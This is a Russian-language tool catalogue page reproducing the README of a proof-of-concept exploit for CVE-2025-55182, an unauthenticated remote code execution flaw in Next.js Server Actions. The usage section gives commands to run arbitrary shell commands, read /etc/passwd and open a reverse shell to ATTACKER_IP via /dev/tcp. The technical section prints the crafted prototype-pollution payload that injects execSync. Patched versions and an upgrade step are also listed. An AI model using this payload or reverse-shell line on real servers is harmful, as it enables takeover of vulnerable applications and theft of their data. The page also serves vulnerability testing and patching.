Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nextjs-CVE-2025-55182 — Эксплойт-доказательство концепции для критической неаутентифицированной RCE в Server Actions Next.js через десериализацию протокола React Flight, позволяющий выполнение произвольных команд на уязвимых серверах. | Kitploit
Инструменты/GitHubGitHub/d0cnull/nextjs-cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
d0cnull/nextjs-cve-2025-55182

nextjs-CVE-2025-55182

Эксплойт-доказательство концепции для критической неаутентифицированной RCE в Server Actions Next.js через десериализацию протокола React Flight, позволяющий выполнение произвольных команд на уязвимых серверах.

Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-55182 / CVE-2025-66478 (React2Shell) - Концептуальное доказательство удаленного выполнения кода (RCE) в Next.js

Критическая уязвимость в Next.js Server Actions, позволяющая неаутентифицированное удаленное выполнение кода через десериализацию React Flight Protocol

Обзор

Этот репозиторий содержит Концептуальное доказательство (PoC) критической уязвимости RCE, затрагивающей приложения Next.js, использующие Server Actions (React Server Functions).

ДетальИнформация
CVECVE-2025-55182 / CVE-2025-66478
СерьезностьКритическая (CVSS 10.0)
Затронутые ReactReact 19.0.0, 19.1.0, 19.1.1, 19.2.0
Затронутые Next.jsNext.js 15.x, 16.x, 14.3.0-canary.77+
НЕ затронутыNext.js 14.x stable, 13.x, Pages Router, Edge Runtime
Исправлено в Next.js15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
Исправлено в React19.0.1, 19.1.2, 19.2.1
ТипУдаленное выполнение кода (RCE)
Требуется аутентификацияНет

Описание уязвимости

Уязвимость существует в том, как React Flight Protocol десериализует блоки при обработке Server Actions. Злоумышленник может использовать прототипное загрязнение через специально созданные данные формы, чтобы:

  1. Получить доступ к конструктору Function через обход цепочки прототипов (__proto__)
  2. Выполнить произвольный JavaScript-код на сервере
  3. Достичь полного удаленного выполнения кода без аутентификации

Это происходит до какой-либо проверки серверного действия, что делает уязвимость эксплуатируемой в любом приложении Next.js с включенными Server Actions.

Затронутые приложения

Любое приложение Next.js уязвимо, если:

  • Использует Server Actions (по умолчанию в App Router)
  • Запущено на Next.js 15.x или 16.x (или 14.3.0-canary.77+)
  • Отсутствуют специальные меры защиты

Использование

Требования

root@kitploit:~
pip install requests

Запуск PoC

root@kitploit:~
python3 poc.py <TARGET_URL> "<COMMAND>"

Примеры

root@kitploit:~
# Test command execution
python3 poc.py http://localhost:3000 "id"

# Read sensitive files
python3 poc.py http://localhost:3000 "cat /etc/passwd"

# Reverse shell (for authorized testing only)
python3 poc.py http://localhost:3000 "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Пример вывода

root@kitploit:~
$ python3 poc.py http://localhost:3000 "whoami"
500
0:{"a":"$@1","f":"","b":"development"}
1:E{"digest":"www-data","message":"NEXT_REDIRECT","stack":[],"env":"Server"}

Вывод команды отображается в поле digest.

Технические детали

Эксплойт использует механизм разрешения блоков протокола React Flight:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('{cmd}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

Цепочка атаки:

  1. Обход прототипов через $1:__proto__:then
  2. Доступ к конструктору Function через $1:constructor:constructor
  3. Внедрение произвольного кода через поле _prefix
  4. Выполнение кода во время десериализации (до аутентификации)

Меры защиты

Немедленно обновитесь:

root@kitploit:~
npm install next@latest
# or
pnpm update next

Исправленные версии: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Примечание: Next.js 14.x стабильные и 13.x НЕ уязвимы.

Отказ от ответственности

⚠️ Этот PoC предназначен только для образовательных целей и авторизованного тестирования безопасности.

Несанкционированный доступ к компьютерным системам незаконен. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Авторы не несут ответственности за любое неправомерное использование.

Благодарности

Основано на оригинальном исследовании @msanft. Вся заслуга в обнаружении уязвимости и создании первоначального PoC принадлежит им.

Ссылки

  • Оригинальное исследование CVE-2025-55182
  • Официальное уведомление Next.js о CVE
  • Анализ React2Shell от Wiz Research
  • React Flight Protocol
  • NIST NVD - CVE-2025-55182

Ключевые слова

Next.js RCE, Next.js vulnerability, CVE-2025-55182, CVE-2025-66478, React2Shell, React Server Components exploit, Next.js Server Actions RCE, prototype pollution Next.js, React Flight Protocol vulnerability, Next.js security, Next.js remote code execution, Next.js exploit PoC, Server Actions vulnerability, React RSC RCE

Скачать инструмент